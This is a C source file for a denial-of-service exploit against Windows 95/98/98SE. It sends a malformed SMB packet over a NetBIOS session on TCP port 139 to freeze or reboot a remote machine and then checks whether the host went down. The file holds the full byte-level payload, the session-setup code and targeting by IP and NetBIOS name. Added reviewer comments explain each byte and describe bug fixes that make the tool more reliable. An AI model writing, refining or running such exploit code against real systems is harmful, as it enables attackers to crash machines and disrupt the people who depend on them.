Microsoft Windows 95/98/98SE denial-of-service utility that sends a malformed SMB message over a NetBIOS session (TCP port 139) to lock up or reboot the target machine.
926d171c8c658d8861fb0067abda1bc605fcc9caf1e0a70a1986947d8c097432
/*
Windows 95,98 and 98SE Denial Of Service.
by koper <koper@linuxmail.org>
Sends a malformed SMB message over a NetBIOS session (TCP port 139)
to freeze or reboot the remote machine.
Don't abuse ... @least not 2much
;>
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define PORT 139 //NetBIOS port ... ma sie rozumiec ;)
/*
 * SMB payload that main() pushes down the established NetBIOS session right
 * after the session request is acknowledged.  What the bytes show:
 *   offset 0-3   NetBIOS session header: type 0x00, flags 0x00,
 *                length 0x0041 (65 bytes declared to follow)
 *   offset 4-7   SMB protocol id "\xffSMB"
 *   offset 8     SMB command byte 0xd0 (meaning not decoded here)
 *   offset 9-43  all zero (rest of the SMB header and leading fields)
 *   offset 44-45 0x19, 0x00
 *   offset 46-59 0x04 "BEAV" 0x00, 0x04 "BEAVIS" 0x00 -- two 0x04-prefixed
 *                ASCII names
 *   offset 60-62 0x01, then 0x08 0x00 (a 2-byte length of 8)
 *   offset 63-105 the 43-byte text "Open Your mind... and I will be there. kpr\n"
 * The array is 106 bytes plus the string NUL (107).  main() writes only the
 * first 72 bytes (see the write() there), so the declared lengths (65 in the
 * session header, 8 after the 0x01 tag), the 106 bytes present and the 72
 * bytes actually sent all disagree -- presumably that inconsistency is the
 * "malformed" part the tool relies on.  Kept byte-for-byte; do not "fix" it.
 */
char kprcode[]= "\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00" /* session hdr, "\xffSMB", cmd 0xd0 */
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49" /* 0x19, 0x04 "BEAV", 0x04 "BEAVI.. */
"\x53\x00\x01\x08\x00\x4f\x70\x65\x6e\x20\x59\x6f\x75\x72\x20"     /* ..S", 0x01, len 8, "Open Your " */
"\x6d\x69\x6e\x64\x2e\x2e\x2e\x20\x61\x6e\x64\x20\x49\x20\x77\x69"
"\x6c\x6c\x20\x62\x65\x20\x74\x68\x65\x72\x65\x2e\x20\x6b\x70\x72\x0a"; /* "...there. kpr\n" */
/*
 * Wire image of the NetBIOS session request that main() fills in and sends
 * with one 72-byte write() (appears to be a session request as in RFC 1002;
 * verify against the spec).  Every member is a char array, so the struct has
 * no padding: 5 + 32 + 2 + 32 + 1 = 72 bytes, matching the 0x0044 (= 68)
 * length byte that follows the 4-byte session header.
 */
struct samba_req {
	char first[5];     /* 0x81 0x00 0x00 0x44 + 0x20: session hdr and called-name length */
	char yourname[32]; /* called (target) name, first-level encoded by name() */
	char sep[2];       /* 0x00 terminator + 0x20: calling-name length */
	char myname[32];   /* calling name ("KPR", encoded) */
	char end[1];       /* 0x00 terminator */
};
void name(char *name1, char *name2);
unsigned long int dns (char *host);
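/*
 * Entry point.  argv[1] is the target host (IP or name), argv[2] its NetBIOS
 * name (the usage text asks for uppercase; the string is encoded as given).
 * Flow: first-level encode both NetBIOS names, resolve the target, connect
 * to TCP port PORT (139), send a NetBIOS session request, and on a positive
 * session response (first byte 0x82) send the first 72 bytes of kprcode.
 * The target is then declared "down" if a fresh TCP connect fails.
 *
 * Fixes over the original: socket()/write() results are checked, the unused
 * second dns() call and `temp` are gone, piggie is zeroed before use, the
 * response byte is compared as an unsigned value, soc2 is closed, and the
 * write()/read() that the original issued on the already-closed descriptor
 * (a silent EBADF, never an actual probe) are removed -- the reconnect at the
 * end is the only liveness check there ever was.
 * Exits 1 on any setup or I/O error; returns 0 otherwise.
 * NOTE(review): none of the reads have a timeout; a target that accepts the
 * session but never answers will block this tool indefinitely (as before).
 */
int main(int argc, char *argv[]){
    enum { BUFLEN = 4000, NBNAME_LEN = 32, PAYLOAD_LEN = 72 };
    char buf[BUFLEN];
    char myname[NBNAME_LEN + 1], yourname[NBNAME_LEN + 1];
    struct sockaddr_in piggie;
    struct samba_req smbreq;
    int soc, soc2;
    ssize_t got;

    printf("\n******************************************************\n");
    printf("* Windows 95 && 98 Denial Of Service NetBIOS exploit *\n");
    printf("* \t by koper <koper@linuxmail.org> *\n");
    printf("******************************************************\n");
    printf(" Version: 0.5 - Support for Windows 98 SE\n\n");

    if (argc < 3) {
        printf("Usage: %s <IP> <NetBIOS name>\n", argv[0]);
        printf("NetBIOS name must be in uppercase!\n");
        exit(1);
    }

    /* Encode both names; the last pair (the 16th byte) is overwritten with
     * "AD", i.e. byte 0x03, before the names go on the wire. */
    name("KPR", myname);
    myname[30] = 'A';
    myname[31] = 'D';
    name(argv[2], yourname);
    yourname[30] = 'A';
    yourname[31] = 'D';

    printf("[+] Trying %s as NetBIOS name %s...\n", argv[1], argv[2]);
    printf("[+] Resolving...\n");
    memset(&piggie, 0, sizeof piggie);
    piggie.sin_family = AF_INET;
    piggie.sin_port = htons(PORT);
    piggie.sin_addr.s_addr = (in_addr_t)dns(argv[1]); /* dns() exits if unresolvable */
    printf("[+] %s resolved: OK...\n", argv[1]);

    soc = socket(AF_INET, SOCK_STREAM, 0);
    if (soc < 0) {
        perror("[+] Error");
        exit(1);
    }
    if (connect(soc, (struct sockaddr *)&piggie, sizeof piggie) < 0) {
        perror("[+] Error");
        close(soc);
        exit(1);
    }

    /* Session request: header + called name + separator + calling name + NUL.
     * All 72 bytes of the struct are assigned, nothing is left uninitialised. */
    memset(buf, 0, sizeof buf);
    memcpy(smbreq.first, "\x81\x00\x00\x44\x20", sizeof smbreq.first);
    memcpy(smbreq.yourname, yourname, sizeof smbreq.yourname);
    memcpy(smbreq.sep, "\x00\x20", sizeof smbreq.sep);
    memcpy(smbreq.myname, myname, sizeof smbreq.myname);
    smbreq.end[0] = '\0';

    if (write(soc, &smbreq, sizeof smbreq) != (ssize_t)sizeof smbreq) {
        perror("[+] Error");
        close(soc);
        exit(1);
    }
    got = read(soc, buf, sizeof buf);
    if (got < 1) {
        printf("[+] Oh my god! There's no responce !?!\n[+] Panic!\n");
        close(soc);
        exit(1);
    }
    /* 0x82 = positive session response; compare unsigned so char signedness
     * cannot matter. */
    if ((unsigned char)buf[0] != 0x82) {
        printf("[+] No responce from remote machine (check NBname)...\n[+] Panic!\n");
        close(soc);
        exit(1);
    }
    printf("[+] Got responce from remote host...\n");
    printf("[+] Initialising attack...\n");

    /* The original sends exactly 72 bytes of kprcode (not sizeof kprcode,
     * which is 107); preserved on purpose so the wire behaviour is unchanged. */
    if (write(soc, kprcode, PAYLOAD_LEN) != PAYLOAD_LEN) {
        perror("[+] Error");
        close(soc);
        exit(1);
    }
    (void)read(soc, buf, sizeof buf); /* reply, if any, is not inspected */
    close(soc);
    printf("[+] Packet SENT!\n");

    /* Liveness check: a brand-new TCP connection to the same port. */
    printf("[+] Checking hostname...\n");
    soc2 = socket(AF_INET, SOCK_STREAM, 0);
    if (soc2 < 0) {
        perror("[+] Error");
        exit(1);
    }
    if (connect(soc2, (struct sockaddr *)&piggie, sizeof piggie) < 0)
        printf("[+] Host is down... YEAH!\n\n");
    else
        printf("[+] %s is still up, probably not vulnerable...\n\n", argv[1]);
    close(soc2);
    return 0;
}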
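/*
 * First-level NetBIOS name encoding: every byte of name1 becomes two letters,
 * 'A' + high nibble followed by 'A' + low nibble.  Exactly 16 input bytes are
 * encoded; shorter input is padded with spaces (0x20 -> "CA"), longer input
 * is silently truncated to its first 16 bytes.
 *
 * name1: NUL-terminated input (main() passes the user's NetBIOS name as-is)
 * name2: output buffer of at least 33 bytes; receives 32 letters plus a NUL
 *
 * Fix over the original: the input byte is taken as unsigned.  With a signed
 * char, a byte >= 0x80 made c/16 and c%16 negative and produced characters
 * outside 'A'..'P' (e.g. 0xff encoded as "A@" instead of "PP").
 */
void name(char *name1, char *name2)
{
    size_t len = strlen(name1);
    int i;

    for (i = 0; i < 16; i++) {
        /* past the end of the input: pad with a space, which encodes as "CA" */
        unsigned char c = ((size_t)i < len) ? (unsigned char)name1[i] : 0x20;
        name2[i * 2]     = (char)('A' + (c >> 4));
        name2[i * 2 + 1] = (char)('A' + (c & 0x0f));
    }
    name2[32] = '\0';
}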
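/*
 * Resolve host (dotted quad or hostname) to an IPv4 address in network byte
 * order; the value always fits in an in_addr_t.  Prints a message and exits
 * with status 1 if the name cannot be resolved, so callers never see a
 * failure return.
 *
 * Fixes over the original: inet_addr()'s INADDR_NONE is 0xffffffff, which
 * never compares equal to -1 once stored in a 64-bit long, so unresolvable
 * names were silently returned as the broadcast address and gethostbyname()
 * was never reached; the 4-byte h_addr was read through an unsigned long *
 * (an over-read on LP64 and endian-dependent); numeric input fell off the
 * end of the function with no return value; and the failure path exited 0.
 */
unsigned long int dns (char *host)
{
    struct in_addr addr;
    struct hostent *he;

    /* Numeric form first: inet_pton() reports failure unambiguously. */
    if (inet_pton(AF_INET, host, &addr) == 1)
        return addr.s_addr;

    he = gethostbyname(host);
    if (he == NULL || he->h_addrtype != AF_INET || he->h_addr_list[0] == NULL
        || he->h_length != (int)sizeof addr) {
        printf("[+] Unable to resolve %s...\n[+] Panic!\n", host);
        exit(1);
    }
    /* Copy the 4 address bytes instead of type-punning the pointer. */
    memcpy(&addr, he->h_addr_list[0], sizeof addr);
    return addr.s_addr;
}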